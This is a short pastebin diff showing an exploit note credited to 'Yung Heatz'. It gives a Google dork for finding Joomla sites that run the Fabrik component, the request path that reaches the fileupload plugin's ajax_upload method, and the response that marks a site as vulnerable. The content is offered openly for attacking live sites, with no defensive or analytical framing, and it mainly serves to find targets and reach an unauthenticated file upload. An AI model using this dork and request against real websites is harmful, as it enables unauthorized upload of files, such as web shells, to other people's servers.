View difference between Paste ID: SwTc3TTr and j5kbX4AA
SHOW: | | - or go back to the newest paste.
1
$ Exploit tested on windows 10 by Yung Heatz
2
3
$ Dork : inurl:index.php?option=com_fabrik
4
5
-----------------------------------------------------------|
6
Exploit :
7
8
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
9
10
Vuln = {"filepath":null,"uri":null}